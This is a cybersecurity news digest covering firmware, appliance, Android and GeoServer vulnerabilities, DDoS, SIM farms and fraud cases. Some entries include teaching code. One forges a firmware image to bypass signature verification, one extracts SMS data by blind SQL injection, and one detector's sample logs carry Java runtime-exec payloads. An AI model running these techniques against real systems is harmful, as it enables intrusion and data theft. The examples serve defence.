Daily Brief

Total articles found: 11759

2025-09-23 19:43:53 theregister VULNERABILITIES SonicWall Releases Critical Firmware Update to Combat Rootkit Attacks
SonicWall has released firmware 10.2.2.2-92sv for its SMA 100 series appliances in response to OVERSTEP, a rootkit that Google's threat analysts found deployed on fully patched, end-of-life SMA 100 devices. OVERSTEP modifies the appliance's boot process so that it survives reboots, and it steals credentials and session material, giving the attacker persistent access. Google attributes the campaign to UNC6148, an "uncategorized" cluster not yet tied to a named group. Separately, SonicWall and CISA have warned of brute-force attacks against SonicWall's cloud backup service and urged customers to verify whether their devices are affected, and SonicWall firewalls have been hit by Akira-linked ransomware affiliates exploiting CVE-2024-40766, a high-severity access-control flaw in SonicOS. SonicWall advises SMA 100 customers to upgrade to 10.2.2.2-92sv, which adds checks for known rootkit files. The episode is a reminder that an appliance can be fully patched and still compromised, so vendor advisories and appliance integrity need ongoing attention, not just a patch cadence.
2025-09-23 18:07:22 thehackernews VULNERABILITIES Supermicro BMC Firmware Vulnerabilities Threaten Root of Trust Security
Binarly researchers disclosed two new vulnerabilities in Supermicro Baseboard Management Controller (BMC) firmware that let an attacker bypass image verification and install a malicious firmware image. One of them, CVE-2025-7937, is a bypass of Supermicro's fix for CVE-2024-10237: in both cases the verifier consults a region table carried inside the image to decide which bytes the cryptographic signature covers, so a crafted image can leave the signed regions intact while adding unsigned content that the BMC then runs. Two related flaws, CVE-2024-10238 and CVE-2024-10239, are stack overflows in the image-verification code that allow arbitrary code execution in the BMC context. Because the BMC is the platform's Root of Trust (RoT), a successful bypass gives persistent control over the BMC and, from there, the host OS, and the damage would be ecosystem-wide if a signing key were ever leaked. Binarly recommends, citing PKfail as the precedent, using distinct signing keys per product line so that one leaked key cannot be used against a vendor's entire fleet.
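The verification weakness described above can be shown in miniature. The following is an added example written for this brief, not Supermicro's code or Binarly's proof of concept: it models a firmware image that carries its own table of "signed regions", uses an HMAC-SHA256 tag as a stand-in for the vendor's asymmetric signature, and contrasts a verifier that trusts the in-image table with one that insists the signature cover every byte before it. The image layout, the `fwmap` encoding and the key are all assumptions made for illustration.

```python
import hashlib
import hmac
import struct

# Constructed stand-in for the vendor's signing key. A real BMC Root of Trust
# verifies an asymmetric signature against a public key it holds; HMAC is
# used here only so the example runs without extra libraries.
SIGNING_KEY = b"example-only-signing-key"
SIG_LEN = 32          # HMAC-SHA256 tag length
MAP_LEN = 2 + 8       # u16 entry count + one (u32 offset, u32 length) entry


def build_fwmap(regions):
    """Serialize the region table: u16 count, then (u32 offset, u32 length)."""
    return struct.pack(">H", len(regions)) + b"".join(
        struct.pack(">II", off, ln) for off, ln in regions)


def parse_fwmap(body):
    count = struct.unpack_from(">H", body, 0)[0]
    return [struct.unpack_from(">II", body, 2 + 8 * i) for i in range(count)]


def sign_regions(body, regions):
    """Tag only the bytes the region table points at."""
    h = hmac.new(SIGNING_KEY, digestmod=hashlib.sha256)
    for off, ln in regions:
        h.update(body[off:off + ln])
    return h.digest()


def build_image(payload):
    """Vendor side: one region covering the table and the payload."""
    regions = [(0, MAP_LEN + len(payload))]
    body = build_fwmap(regions) + payload
    return body + sign_regions(body, regions)


def forge_image(legit_image, extra):
    """Attacker side: prepend a new table that points at the original, still
    intact, signed bytes and ride unsigned content along behind them. This is
    the shape of a table-redirection bypass, not the exact Supermicro case."""
    body, sig = legit_image[:-SIG_LEN], legit_image[-SIG_LEN:]
    new_map = build_fwmap([(MAP_LEN, len(body))])
    return new_map + body + extra + sig


def verify_vulnerable(image):
    """Lets the image itself say which bytes were signed."""
    body, sig = image[:-SIG_LEN], image[-SIG_LEN:]
    return hmac.compare_digest(sign_regions(body, parse_fwmap(body)), sig)


def verify_hardened(image):
    """Coverage is fixed by the verifier: every byte before the signature,
    table included, must be authenticated, so the table cannot be used to
    carve out an unsigned area."""
    body, sig = image[:-SIG_LEN], image[-SIG_LEN:]
    expected = hmac.new(SIGNING_KEY, body, hashlib.sha256).digest()
    return hmac.compare_digest(expected, sig)


if __name__ == "__main__":
    legit = build_image(b"constructed BMC firmware payload")
    forged = forge_image(legit, b"\xcc" * 16 + b"implant")
    print("legit :", verify_vulnerable(legit), verify_hardened(legit))
    print("forged:", verify_vulnerable(forged), verify_hardened(forged))
```

The forged image passes the vulnerable verifier because the bytes it hashes are the untouched original, and fails the hardened one because the attacker's table and payload are now inside the signed span. The design point carries over to real RoT code: the thing being verified must never be allowed to describe its own coverage.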
2025-09-23 17:58:14 bleepingcomputer VULNERABILITIES Libraesva ESG Releases Emergency Patch for Exploited Vulnerability
Libraesva has issued an emergency patch for its Email Security Gateway (ESG) after CVE-2025-59689 was exploited by a suspected state-sponsored actor against a single appliance. The flaw, present since version 4.5, is a command-injection bug: when the gateway strips active code from certain compressed archive formats it fails to sanitize the content properly, so a malicious email attachment can execute arbitrary shell commands as a non-privileged user. The fix was released 17 hours after the flaw was discovered and was pushed automatically to cloud and on-premise installations; it removes the root cause and scans the appliance for indicators of compromise. Versions below 5.0 are unsupported and will not receive the patch, so those installations must be upgraded manually. A single targeted appliance points to a precise operation rather than mass exploitation, which is exactly the case where quick, automatic remediation and a compromise check matter most.
2025-09-23 17:17:56 thehackernews CYBERCRIME Eurojust Dismantles €100M Cryptocurrency Fraud Across Multiple Nations
European authorities have arrested five people linked to a cryptocurrency investment fraud that took more than €100 million from over 100 victims, most of them in France, Germany, Italy and Spain. Coordinated searches in Spain, Portugal, Italy, Romania and Bulgaria led to the freezing of bank accounts and other assets tied to the ring. The main suspect ran an online investment platform that promised high cryptocurrency returns and moved deposits to accounts in Lithuania for laundering; victims who tried to withdraw were charged additional fees, after which the site disappeared along with their money. Eurojust and Europol coordinated the investigation, which identified victims in 23 countries. For scale, the U.S. Federal Trade Commission reported that Americans lost $5.7 billion to investment scams in 2024, the largest category within $12.5 billion in total reported fraud losses, up 25% on the prior year. The arrests follow other recent actions against investment fraud, including a Seoul Metropolitan Police operation that disrupted a network stealing $30 million from high-profile targets.
2025-09-23 17:17:55 bleepingcomputer MISCELLANEOUS WhatsApp Introduces Privacy-Focused Message Translation for Global Users
WhatsApp has added message translation for Android and iPhone, covering one-to-one chats, groups and channels. On Android users can turn on automatic translation for an entire chat thread; on iPhone each message is translated by tapping 'Translate'. At launch, iOS supports more than 19 languages, while Android starts with six: English, Spanish, Hindi, Portuguese, Russian and Arabic. Translation runs on the device, so message content is not sent to WhatsApp's servers for processing and the feature does not weaken end-to-end encryption. It follows recent additions such as advanced chat privacy and scam-detection features. With more than three billion users in over 180 countries, WhatsApp has an obvious need for multilingual support, and the on-device design is the security-relevant part of the announcement.
2025-09-23 17:03:17 theregister VULNERABILITIES SolarWinds Issues Third Patch for Critical Web Help Desk Flaw
SolarWinds has released a hotfix for a CVSS 9.8 vulnerability in Web Help Desk, tracked as CVE-2025-26399, that lets a remote, unauthenticated attacker execute commands on the host. It is the third fix for the same root cause: CVE-2025-26399 bypasses the patch for CVE-2024-28988, which itself bypassed the patch for CVE-2024-28986, a flaw that was exploited in the wild and added to CISA's Known Exploited Vulnerabilities catalog. The latest bug was reported by an anonymous researcher through Trend Micro's Zero Day Initiative. There is no confirmed exploitation of CVE-2025-26399 yet, but given that the earlier variants were exploited, organizations running Web Help Desk should treat it as urgent: apply the hotfix, keep the product off the public internet where possible, and check for signs that the earlier variants were used against them.
2025-09-23 16:27:48 theregister VULNERABILITIES Critical Android Bug in OnePlus Devices Exposes SMS Data to Apps
Rapid7 has disclosed CVE-2025-10184, a vulnerability in OnePlus phones running OxygenOS 12 and later that lets any installed app read SMS and MMS data without the READ_SMS permission, with no user interaction and no notification. The root cause is in content providers exported by OnePlus's modified Telephony package: they are reachable by any app without a write permission, and their update() path splices caller-supplied selection strings into SQL, giving a SQL injection into the same database that holds the SMS and MMS tables. Because the stolen messages can include one-time codes, the bug defeats SMS-based multi-factor authentication. Rapid7 says it has tried to reach OnePlus since May 2025 without a response and published after the disclosure window lapsed. Until a fix ships, users should install apps only from trusted sources, move MFA to an authenticator app, and prefer encrypted messaging apps over SMS. The vendor silence is the other story here: a missing permission check plus unsanitized SQL is a textbook bug, and it is the lack of a response, not the difficulty of the fix, that has left users exposed.
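The bug class is easy to reproduce outside Android. The following is an added example written for this brief, using Python's sqlite3 to model the provider rather than Rapid7's proof of concept or OnePlus's code: a provider-style update() that splices the caller's selection into its WHERE clause, a blind extraction loop that uses the affected-row count as a one-bit oracle to read a one-time code out of a neighbouring sms table, and a hardened update() that accepts only a whitelisted column and binds the value. Table names, rows and the message text are constructed; the real provider names and schema differ.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the telephony database: one table the exported
    provider is meant to manage, and the sms table that lives beside it."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE push_message (_id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE sms (_id INTEGER PRIMARY KEY, address TEXT, body TEXT);
        INSERT INTO push_message VALUES (1, 'promo');
        INSERT INTO sms VALUES (1, '+15550001', 'Your code is 834512');
    """)
    return db


def provider_update_vulnerable(db, values, selection):
    """Models a ContentProvider.update() that is exported without a write
    permission and concatenates the caller's selection into the SQL. The
    affected-row count is returned to the caller, as Android's update() does."""
    sql = "UPDATE push_message SET title = ? WHERE " + selection
    cur = db.execute(sql, (values["title"],))
    db.commit()
    return cur.rowcount


def leak_sms_body(db, max_len=64):
    """Blind SQL injection through update(): every call asks one yes/no
    question about the sms table, answered by whether the single push_message
    row was touched. char() avoids quoting issues in the injected predicate."""
    body = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):                 # printable ASCII
            selection = (
                f"_id = 1 AND EXISTS(SELECT 1 FROM sms "
                f"WHERE substr(body, {pos}, 1) = char({code}))")
            if provider_update_vulnerable(db, {"title": "promo"}, selection) == 1:
                body += chr(code)
                break
        else:
            break                                   # no match: end of message
    return body


ALLOWED_COLUMNS = {"_id"}


def provider_update_hardened(db, values, column, arg):
    """The caller may only select on a whitelisted column, and the value is a
    bound parameter, so it can never become SQL. On Android the same provider
    would additionally need a write permission or android:exported="false"."""
    if column not in ALLOWED_COLUMNS:
        raise ValueError(f"selection on {column!r} not permitted")
    cur = db.execute(
        f"UPDATE push_message SET title = ? WHERE {column} = ?",
        (values["title"], arg))
    db.commit()
    return cur.rowcount


if __name__ == "__main__":
    db = make_db()
    print("leaked via update() oracle:", leak_sms_body(db))
    print("hardened, injection as value:",
          provider_update_hardened(db, {"title": "x"}, "_id",
                                   "1 OR EXISTS(SELECT 1 FROM sms)"))
```

The extraction never reads a result row; it only watches how many rows the update touched, which is why a write-only entry point with no permission check is enough to read an unrelated table. Binding the value turns the injected predicate into an inert string that matches nothing.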
2025-09-23 15:59:42 bleepingcomputer DDOS Cloudflare Thwarts Record-Breaking 22.2 Tbps DDoS Attack
Cloudflare says it mitigated a DDoS attack peaking at 22.2 Tbps and 10.6 billion packets per second (Bpps), the largest on record. It lasted only about 40 seconds, but at that rate the traffic equals roughly one million 4K video streams at once, and the packet rate is what hurts: stateful firewalls, routers and load balancers are exhausted by packets per second long before they run out of bandwidth. The previous record, an 11.5 Tbps attack also absorbed by Cloudflare, was attributed to the AISURU botnet, which has compromised more than 300,000 routers and IoT devices by exploiting known vulnerabilities. Attacks of this size can only be absorbed upstream, so organizations should have DDoS protection in place before an incident and should patch and harden their own network devices so they do not end up feeding the next botnet.
2025-09-23 15:50:09 thehackernews NATION STATE ACTIVITY Secret Service Dismantles SIM Network Threatening U.S. Officials Near UN
The U.S. Secret Service has dismantled a network of more than 300 SIM servers and 100,000 SIM cards in the New York tri-state area that was being used for telecommunications threats against senior U.S. officials. The timing and the sites' proximity to the United Nations General Assembly made the find urgent. The agency says the equipment could have been used to disable cell towers, mount denial-of-service attacks against the telephone network, and provide anonymous, encrypted communications to threat actors; it was also reportedly used to issue anonymous assassination threats against senior officials. Investigators have found links to nation-state actors, but the countries and individuals involved have not been named. The Secret Service's Advanced Threat Interdiction Unit is leading the investigation. Empty electronic safehouses found in New York, Connecticut and New Jersey suggest an operation set up for wide disruption rather than a single target.
2025-09-23 15:21:14 theregister NATION STATE ACTIVITY Secret Service Dismantles SIM Farm Network Linked to Nation-State Hackers
The US Secret Service has dismantled a network of more than 300 SIM servers across the New York tri-state area, allegedly tied to nation-state hackers. The network controlled more than 100,000 SIM cards and was capable of disrupting cellular service in New York City; it had reportedly been used for telecommunications threats against senior US government officials. The facilities sat close to UN headquarters, which investigators read as a deliberate choice of location. Early findings point to coordination between US-based operators and nation-state actors, though no nation has been named. Forensic examination of the seized equipment is under way. No arrests have been made, but some of the people involved in the communications are already known to federal law enforcement. SIM farms are usually associated with fraud and spam; this case shows they can also be positioned as infrastructure for disrupting critical telecommunications.
2025-09-23 15:12:19 bleepingcomputer DATA BREACH Unpatched GeoServer Exploit Breaches U.S. Federal Agency Network
A U.S. federal civilian executive branch agency was breached through CVE-2024-36401, an unauthenticated remote code execution flaw in GeoServer in which property names in OGC requests are evaluated as XPath expressions. A fix had been available since June 18, 2024, but the agency's instance was still unpatched, and attackers used the flaw to drop web shells and scripts that gave them remote access, persistence and privilege escalation, then moved laterally across the network. The intrusion went unnoticed for three weeks until an endpoint detection and response (EDR) tool flagged the activity and the agency's Security Operations Center investigated. CISA's advisory recommends patching critical, internet-facing vulnerabilities immediately and treating EDR alerts as incidents to be triaged rather than notifications to be filed. Drawing on CISA's other critical infrastructure assessments, the same advisory also calls out weak credentials and poor network segmentation as recurring problems that let an initial foothold become a network-wide compromise.
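One thing a SOC can do the same day such an advisory lands is look back through the access logs in front of GeoServer for the request shape this flaw is abused with: an OGC request whose property reference carries an XPath function call instead of a plain attribute name. The following detection script is an added example written for this brief, not part of CISA's advisory or of GeoServer itself; the log lines are constructed, the combined-log regex assumes a stock Apache or Nginx access log, and the parameter list and suspicious-token patterns are the author's choices that will need tuning for a given deployment. It only sees GET query strings; the same payload sent in an XML POST body is not visible in an access log and needs a WAF or application log instead.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters whose value is a feature-property reference (WFS/WMS) or a CQL
# filter that embeds property references. Assumption: this list is the
# author's, drawn from the request types the advisory names, not exhaustive.
PROPERTY_PARAMS = {"valuereference", "propertyname"}
FILTER_PARAMS = {"cql_filter", "filter"}

# A benign property reference: identifier-ish, optionally namespaced, pathed
# or comma-separated (WFS propertyName accepts a list).
PLAIN_PROPERTY = re.compile(r"^[A-Za-z_][\w:./,\-]*$")

# Markers of the JXPath extension-function abuse used against CVE-2024-36401.
SUSPICIOUS = re.compile(r"java\.lang\.|getRuntime|\bexec\s*\(", re.IGNORECASE)

# Combined log format: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3})')

# Constructed sample log: lines 2 and 4 carry the exploit pattern.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Sep/2025:15:12:19 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0'
    '&request=GetPropertyValue&typeNames=sf:archsites&valueReference=the_geom HTTP/1.1" 200 812',
    '203.0.113.9 - - [23/Sep/2025:15:12:40 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0'
    '&request=GetPropertyValue&typeNames=sf:archsites'
    '&valueReference=exec%28java.lang.Runtime.getRuntime%28%29%2C%27id%27%29 HTTP/1.1" 400 0',
    '10.0.0.5 - - [23/Sep/2025:15:13:02 +0000] "GET /geoserver/wms?service=WMS&request=GetMap'
    '&layers=sf:roads&CQL_FILTER=INTERSECTS(the_geom,POINT(1%202)) HTTP/1.1" 200 40231',
    '203.0.113.9 - - [23/Sep/2025:15:13:15 +0000] "GET /geoserver/wms?service=WMS&request=GetMap'
    '&layers=sf:roads&CQL_FILTER=1%3D1%20AND%20exec%28java.lang.Runtime.getRuntime%28%29%2C%27id%27%29'
    ' HTTP/1.1" 500 0',
]


def inspect_request(path):
    """Return (param, decoded value) pairs in a request path that look like
    XPath/JXPath injection. Values are decoded a second time so a
    double-encoded payload does not slip past the check."""
    hits = []
    for name, values in parse_qs(urlsplit(path).query, keep_blank_values=True).items():
        key = name.lower()
        if key not in PROPERTY_PARAMS and key not in FILTER_PARAMS:
            continue
        for value in values:
            value = unquote(value)
            bad = bool(SUSPICIOUS.search(value))
            # A property reference that is not a plain name is itself suspect;
            # CQL filters legitimately contain function calls, so they get
            # only the marker check.
            if key in PROPERTY_PARAMS and not PLAIN_PROPERTY.match(value):
                bad = True
            if bad:
                hits.append((name, value))
    return hits


def scan_log(lines):
    """Parse access-log lines and return one alert record per suspicious request."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = inspect_request(m["path"])
        if hits:
            alerts.append({"ip": m["ip"], "ts": m["ts"],
                           "status": m["status"], "hits": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["ip"], alert["status"], alert["hits"])
```

A hit with a 200 response deserves the most attention, since an exploit attempt against an unpatched server will usually succeed quietly; a 400 or 500 is still worth recording as reconnaissance from that source address.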
2025-09-23 14:59:33 theregister MALWARE AI-Enhanced Malware Elevates Threats in Hotel Sector Attacks
Kaspersky reports that the "RevengeHotels" group is active again and now uses AI-generated code in its malware, increasing the risk to hotel guests' card and personal data. Between June and August 2025 Kaspersky's Global Research and Analysis Team saw AI-generated components in the group's tooling, which makes intrusions harder to spot and block. The lure has not changed: phishing emails posing as booking requests or job applications deliver the VenomRAT trojan, which gives the attackers remote access to hotel systems. Generating new variants with AI lets the group churn out code that signature-based tools have not seen before, complicating detection and response for hotel IT staff. Brazil remains the main target, but cases are appearing in other regions. Kaspersky advises hotels to train staff on the booking-request lure, tighten spam filtering and deploy endpoint detection capable of catching a RAT, and advises travellers to watch card activity and consider virtual card numbers when paying hotels. RevengeHotels has been operating for more than a decade and has a history of selling access to compromised systems on dark-web markets, so one successful phish can feed further crime well beyond the hotel.
2025-09-23 14:21:05 bleepingcomputer CYBERCRIME European Authorities Dismantle €100 Million Cryptocurrency Fraud Ring
European law enforcement has arrested five people linked to a cryptocurrency investment fraud that took more than €100 million from over 100 victims in 23 countries. Eurojust coordinated the operation with support from Europol, bringing together investigators from Spain, Portugal, Bulgaria, Italy, Lithuania and Romania. Active since at least 2018, the scheme advertised high returns on cryptocurrency investments through convincing online platforms and diverted deposits to accounts controlled from Lithuania; victims who tried to withdraw were charged extra fees and then lost everything when the sites went offline. The joint action day included searches in several countries and the freezing of bank accounts and other assets linked to the suspects. The case fits a wider pattern: Spanish police have previously dismantled similar operations with large losses, and the U.S. Federal Trade Commission reports that Americans lost $12.5 billion to fraud in 2024, $5.7 billion of it to investment scams.
2025-09-23 14:13:55 theregister MISCELLANEOUS Open Source Foundations Urge Financial Support for Critical Infrastructure
The Open Source Security Foundation (OpenSSF) and a group of major foundations have issued a joint call for financial support for the registries and build infrastructure that global software development depends on. Services such as Maven Central and npm serve billions of downloads a month yet run on limited donations and sponsorships. The coalition says the demands now placed on them, including fast dependency resolution and zero downtime, cannot be met on that funding, and that AI-driven dependency scraping and other large-scale automated requests are adding wasteful load and real operating cost. Proposed remedies include partnerships with commercial users, tiered access models for heavy consumers, and more transparency about usage and costs. The appeal echoes earlier ones, such as GitHub's call for government funding of open source, and the same concerns about ecosystem fragility and volunteer burnout. The message to large consumers is direct: contribute, or expect the infrastructure you build on to become less reliable.
2025-09-23 14:03:53 bleepingcomputer MISCELLANEOUS Tenfold Launches Free Identity Governance Tool for Small Organizations
Tenfold Software has released a free Identity Governance & Administration (IGA) edition for organizations with up to 150 users. It automates IT on- and offboarding through role-based access control, so new users get the permissions their role requires and leavers lose them on departure. A self-service portal lets users reset passwords and request access themselves, reducing helpdesk load. The platform gives administrators visibility into Active Directory and SharePoint permissions and helps keep group structures in line with best practice, and it centralizes monitoring of Microsoft 365 file sharing so external shares and potential data leaks can be spotted. Regular access reviews are built in, which counters privilege creep by ensuring users retain only the rights they still need. The Community Edition targets small and mid-sized businesses and carries the full feature set without the complexity of an enterprise deployment.